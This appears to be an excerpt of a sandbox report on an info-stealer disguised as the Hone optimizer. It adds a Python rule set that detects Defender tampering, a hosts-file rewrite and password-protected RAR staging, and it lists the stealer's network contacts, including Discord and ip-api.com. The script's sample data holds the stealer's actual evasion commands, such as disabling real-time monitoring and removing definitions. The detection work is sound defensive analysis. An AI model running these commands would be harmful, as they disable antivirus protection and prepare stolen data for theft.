C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c date /t
C:\Windows\system32\reg.exe
reg export HKCU C:\Hone\HoneRevert\11.14.2024\HKLM.reg /y
C:\Windows\system32\reg.exe
reg export HKCU C:\Hone\HoneRevert\11.14.2024\HKCU.reg /y
C:\Windows\system32\mode.com
Mode 130,45
C:\Windows\System32\choice.exe
C:\Windows\System32\choice.exe /c:1234567XD /n /m " Select a corresponding number to the options above > "
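The process tree above interleaves the bundled optimizer's own housekeeping (Mode, choice.exe, Checkpoint-Computer, reg export) with the stealer's defense-evasion and staging steps: Defender exclusions and feature toggles via Set-MpPreference/Add-MpPreference, MpCmdRun -RemoveDefinitions, an attrib -r / attrib +r pair around an encoded PowerShell command against the hosts file, and a header-encrypted RAR archive built with -hp"123". The rule set below, written here as an added example and not part of the sandbox report or of either project's code, scans a list of command lines for those patterns and isolates the commands run while the hosts file was writable. The sample input is constructed from the command lines shown above (the encoded PowerShell payload, which the page does not reproduce, is replaced by a placeholder); the rule names, severities and the verdict threshold are this example's own assumptions.

```python
"""Flag Defender tampering, hosts-file rewrites and archive staging in a
sandbox process list. Added example; the rules and sample input are
assumptions built from the process tree above, not the report's own data."""
import re
from dataclasses import dataclass

# Constructed sample: command lines copied from the process list above.
# The -EncodedCommand argument is a placeholder, since the page elides it.
SAMPLE_CMDLINES = [
    "powershell -Command Add-MpPreference -ExclusionPath "
    "'C:\\Users\\Admin\\AppData\\Local\\Temp\\Hone-Optimizer.exe'",
    "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true "
    "-DisableIOAVProtection $true -DisableRealtimeMonitoring $true "
    "-DisableScriptScanning $true -EnableControlledFolderAccess Disabled "
    "-EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled "
    "-SubmitSamplesConsent NeverSend",
    '"%ProgramFiles%\\Windows Defender\\MpCmdRun.exe" -RemoveDefinitions -All',
    "attrib -r C:\\Windows\\System32\\drivers\\etc\\hosts",
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand <elided>",
    "attrib +r C:\\Windows\\System32\\drivers\\etc\\hosts",
    'C:\\Users\\Admin\\AppData\\Local\\Temp\\_MEI31722\\rar.exe a -r -hp"123" '
    '"C:\\Users\\Admin\\AppData\\Local\\Temp\\alpWw.zip" *',
    "tasklist /FO LIST",
    "wmic csproduct get uuid",
    "powershell -ExecutionPolicy Unrestricted -NoProfile Checkpoint-Computer "
    "-Description 'Hone Restore Point'",
]

# (rule name, pattern, severity). Names and severities are this example's own.
RULES = [
    ("defender_exclusion", re.compile(r"Add-MpPreference\s+-ExclusionPath", re.I), "high"),
    ("defender_disable", re.compile(r"Set-MpPreference\b.*-Disable\w+\s+\$true", re.I), "high"),
    ("defender_cloud_off", re.compile(r"-MAPSReporting\s+Disabled|-SubmitSamplesConsent\s+NeverSend", re.I), "high"),
    ("defender_definitions_removed", re.compile(r'MpCmdRun\.exe"?\s+-RemoveDefinitions', re.I), "high"),
    ("hosts_attrib_toggle", re.compile(r"attrib\s+[-+]r\s+.*drivers\\etc\\hosts", re.I), "medium"),
    ("encoded_powershell", re.compile(r"powershell(\.exe)?\b.*-(EncodedCommand|enc|e)\b", re.I), "medium"),
    ("password_archive_staging", re.compile(r'\brar(\.exe)?"?\s+a\b.*\s-hp\S*', re.I), "high"),
]


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    cmdline: str
    detail: str = ""


def archive_password(cmd):
    """Return (password, headers_encrypted) for a RAR -p/-hp switch, else None.
    -hp also encrypts file headers, so names are hidden without the password,
    but the password itself is visible in the command line."""
    m = re.search(r'\s-(hp|p)"?([^"\s]*)', cmd)
    if not m:
        return None
    return m.group(2), m.group(1) == "hp"


def scan_cmdline(cmd):
    """Apply every rule to one command line and return its findings."""
    findings = []
    for name, pattern, severity in RULES:
        if pattern.search(cmd):
            detail = ""
            if name == "password_archive_staging":
                pw = archive_password(cmd)
                if pw:
                    detail = f"headers_encrypted={pw[1]} password={pw[0]}"
            findings.append(Finding(name, severity, cmd, detail))
    return findings


def scan(cmdlines):
    out = []
    for cmd in cmdlines:
        out.extend(scan_cmdline(cmd))
    return out


def hosts_rewrite_window(cmdlines):
    """Commands executed between 'attrib -r ...hosts' and 'attrib +r ...hosts';
    whatever ran in that window is the likely writer of the hosts file."""
    unlock = re.compile(r"attrib\s+-r\s+.*drivers\\etc\\hosts", re.I)
    relock = re.compile(r"attrib\s+\+r\s+.*drivers\\etc\\hosts", re.I)
    window, inside = [], False
    for cmd in cmdlines:
        if unlock.search(cmd):
            inside, window = True, []
        elif inside and relock.search(cmd):
            return window
        elif inside:
            window.append(cmd)
    return window if inside else []


def summarize(cmdlines):
    """Distinct rules hit, high-severity subset, hosts window and a verdict.
    Threshold of two high-severity rules is an assumption for this example."""
    findings = scan(cmdlines)
    rules = sorted({f.rule for f in findings})
    high = sorted({f.rule for f in findings if f.severity == "high"})
    verdict = "defense evasion + staging" if len(high) >= 2 else "review"
    return {"rules": rules, "high": high,
            "hosts_window": hosts_rewrite_window(cmdlines), "verdict": verdict}


if __name__ == "__main__":
    for f in scan(SAMPLE_CMDLINES):
        print(f"[{f.severity}] {f.rule}: {f.cmdline[:70]} {f.detail}")
    print(summarize(SAMPLE_CMDLINES)["verdict"])
```

Benign lines from the same tree (tasklist, wmic csproduct, Checkpoint-Computer) hit no rule, which is the point of running the rules over the whole list rather than over a single suspicious command: the verdict rests on several independent tampering steps, and the hosts window pins the encoded PowerShell command as the only thing that ran while the file was writable.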
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | blank-jl67d.in | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| GB | 142.250.180.3:443 | gstatic.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| N/A | 127.0.0.1:50111 | N/A | tcp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
Files